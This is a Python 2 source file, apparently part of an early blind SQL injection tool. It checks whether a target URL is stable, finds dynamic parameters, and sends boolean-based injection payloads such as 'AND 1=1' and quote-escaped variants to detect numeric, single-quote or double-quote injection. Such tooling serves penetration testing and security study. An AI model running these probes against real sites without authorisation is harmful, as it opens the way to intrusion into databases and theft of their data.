#!/usr/bin/env python


import time

from common import Common


class InjectionCheck(Common):
    def __checkSqlInjection(self, parameter, value):
        """
        Check if the url parameter is SQL injectable and
        identify the type of SQL injection:

            * Numeric/Unescaped injection
            * String/Single quote injection
            * String/Double quotes injection
        """

        logMsg  = "testing numeric/unescaped injection "
        logMsg += "on parameter '%s'" % parameter
        self.log(logMsg)

        url = self.urlReplace(parameter, value, "%s AND 1=1" % value)
        trueResult = self.queryPage(url)

        if trueResult == self.args.defaultResult:
            url = self.urlReplace(parameter, value, "%s AND 1=2" % value)
            falseResult = self.queryPage(url)

            if falseResult != self.args.defaultResult:
                logMsg  = "confirming numeric/unescaped injection "
                logMsg += "on parameter '%s'" % parameter
                self.log(logMsg)

                url = self.urlReplace(parameter, value, "%s AND NoValue" % value)
                falseResult = self.queryPage(url)

                if falseResult != self.args.defaultResult:
                    logMsg  = "parameter '%s' is " % parameter
                    logMsg += "numeric/unescaped injectable" 
                    self.log(logMsg)

                    self.args.injectionMethod = "numeric"

                    return True

        logMsg  = "parameter '%s' is not " % parameter
        logMsg += "numeric/unescaped injectable"
        self.log(logMsg)

        logMsg  = "testing string/single quote injection "
        logMsg += "on parameter '%s'" % parameter
        self.log(logMsg)

        url = self.urlReplace(parameter, value, "%s' AND '1'='1" % value)
        trueResult = self.queryPage(url)

        if trueResult == self.args.defaultResult:
            url = self.urlReplace(parameter, value, "%s' AND '1'='2" % value)
            falseResult = self.queryPage(url)

            if falseResult != self.args.defaultResult:
                logMsg  = "confirming string/single quote injection "
                logMsg += "on parameter '%s'" % parameter
                self.log(logMsg)

                url = self.urlReplace(parameter, value, "%s' and NoValue" % value)
                falseResult = self.queryPage(url)

                if falseResult != self.args.defaultResult:
                    logMsg  = "parameter '%s' is " % parameter
                    logMsg += "string/single quote injectable" 
                    self.log(logMsg)

                    self.args.injectionMethod = "stringsingle"

                    return True

        logMsg  = "parameter '%s' is not " % parameter
        logMsg += "string/single quote injectable"
        self.log(logMsg)

        logMsg  = "testing string/double quotes injection "
        logMsg += "on parameter '%s'" % parameter
        self.log(logMsg)

        url = self.urlReplace(parameter, value, '%s" AND "1"="1' % value)
        trueResult = self.queryPage(url)

        if trueResult == self.args.defaultResult:
            url = self.urlReplace(parameter, value, '%s" AND "1"="2' % value)
            falseResult = self.queryPage(url)

            if falseResult != self.args.defaultResult:
                logMsg  = "confirming string/double quotes injection "
                logMsg += "on parameter '%s'" % parameter
                self.log(logMsg)

                url = self.urlReplace(parameter, value, '%s" AND "NoValue' % value)
                falseResult = self.queryPage(url)

                if falseResult != self.args.defaultResult:
                    logMsg  = "parameter '%s' is " % parameter
                    logMsg += "string/double quotes injectable" 
                    self.log(logMsg)

                    self.args.injectionMethod = "stringdouble"

                    return True

        logMsg  = "parameter '%s' is not " % parameter
        logMsg += "string/double quotes injectable"
        self.log(logMsg)

        return False


    def __checkDynParam(self, parameter, value):
        """
        Check if the url parameter is dynamic. If it is dynamic,
        the content of the page differs, otherwise the dynamicity
        might depend on another parameter.
        """

        self.args.defaultResult = self.queryPage(self.args.url)

        url = self.urlReplace(parameter, value, "47")
        dynResult1 = self.queryPage(url)

        if self.args.defaultResult == dynResult1:
            return False

        logMsg = "confirming that '%s' parameter is dynamic" % parameter
        self.log(logMsg)

        url = self.urlReplace(parameter, value, "'NoValue")
        dynResult2 = self.queryPage(url)

        url = self.urlReplace(parameter, value, '"NoValue')
        dynResult3 = self.queryPage(url)

        condition  = self.args.defaultResult != dynResult2
        condition |= self.args.defaultResult != dynResult3

        return condition


    def __checkUrlStable(self):
        """
        Check if the url is stable requesting the original url
        page three times with a small delay within each request
        to assume it is.

        In case the content of the page differs when requesting
        the same page, the dynamicity might depend on other
        settings.
        """

        firstResult = self.queryPage(self.args.url)
        time.sleep(0.5)

        secondResult = self.queryPage(self.args.url)
        time.sleep(0.5)

        thirdResult = self.queryPage(self.args.url)

        condition  = firstResult == secondResult
        condition &= secondResult == thirdResult

        return condition


    def check(self, checkedArgs):
        """
        Perform checks on the url:

            [*] Check if url is stable requesting the original
                url three times;
            [*] Parse all parameters, identify the first dynamic
                one and check if it is sql injectable, if it is
                not injectable pass to check the next dynamic
                parameter.
        """

        self.args = checkedArgs
        self.args.injParameter = None

        if not self.args.string:
            logMsg = "testing if the url is stable, wait a few seconds"
            self.log(logMsg)

            if not self.__checkUrlStable():
                errMsg  = "url is not stable, unable to "
                errMsg += "perform blind SQL injection"
                raise Exception, errMsg
            else:
                logMsg = "url is stable"
                self.log(logMsg)

        for parameter, value in self.args.parameters.items():
            logMsg = "testing if '%s' parameter is dynamic" % parameter
            self.log(logMsg)

            if not self.__checkDynParam(parameter, value):
                warnMsg = "parameter '%s' is not dynamic" % parameter
                self.warn(warnMsg)
            else:
                logMsg = "parameter '%s' is dynamic" % parameter
                self.log(logMsg)

                logMsg  = "testing sql injection on "
                logMsg += "parameter '%s'" % parameter
                self.log(logMsg)

                if not self.__checkSqlInjection(parameter, value):
                    warnMsg = "parameter '%s' is not injectable" % parameter
                    self.warn(warnMsg)
                else:
                    self.args.injParameter = parameter
                    break

        return self.args
